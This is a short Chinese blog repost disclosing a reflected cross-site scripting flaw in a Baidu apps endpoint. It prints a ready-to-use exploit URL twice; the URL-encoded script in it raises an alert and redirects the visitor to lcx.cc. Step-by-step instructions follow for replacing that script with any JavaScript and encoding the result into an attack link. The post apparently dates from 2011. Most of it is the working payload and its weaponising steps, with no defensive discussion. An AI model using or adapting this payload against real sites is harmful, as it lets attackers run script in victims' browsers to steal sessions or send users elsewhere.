手贱乱点 - 居然点到了百度 XSS 漏洞一枚

admin 2021年4月3日18:53:17评论0 views字数 1228阅读4分5秒阅读模式

百度 XSS 跨站漏洞

百度 XSS 跨站漏洞一个,漏洞演示:

http://apps.hi.baidu.com/dashan/data/status?asyn=1&callback=CustomEvent.checkDashStatus&current=d54b41625f7a65726ffe0a&portrait[]==%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%4E%75%63%6C%65%61%72%27%41%74%6B%20%32%30%31%31%2D%30%32%2D%30%33%20%32%31%3A%31%39%3A%31%38%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%22%3C%2F%73%63%72%69%70%74%3E

漏洞发现者:末日,没啥技术含量的鸡肋漏洞,不解释了。。。

利用代码:

http://apps.hi.baidu.com/dashan/data/status?asyn=1&callback=CustomEvent.checkDashStatus&current=d54b41625f7a65726ffe0a&portrait[]==%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%4E%75%63%6C%65%61%72%27%41%74%6B%20%32%30%31%31%2D%30%32%2D%30%33%20%32%31%3A%31%39%3A%31%38%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%22%3C%2F%73%63%72%69%70%74%3E

红色部分为 URL 编码过的 JavaScript 代码,未编码的如下:

利用步骤:

    1、将蓝色部分,替换为你要执行的 JavaScript 代码。

    2、替换好后,再进行 URL 编码。

    3、将编码后的结果,替换上边红色部分。

    4、最终的URL地址既是漏洞利用地址。

文章来源于lcx.cc:手贱乱点 - 居然点到了百度 XSS 漏洞一枚

相关推荐: 对于一个http请求,如何找里面的安全漏洞,能否自动化完成呢?

对于一个http请求,如何找里面的安全漏洞,能否自动化完成呢? xsser (十根阳具有长短!!) | 2014-06-16 14:25 POST /cpc/incrementPV HTTP/1.1 Host: x.com Content-Length: 48…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:53:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   手贱乱点 - 居然点到了百度 XSS 漏洞一枚https://cn-sec.com/archives/319046.html

发表评论

匿名网友 填写信息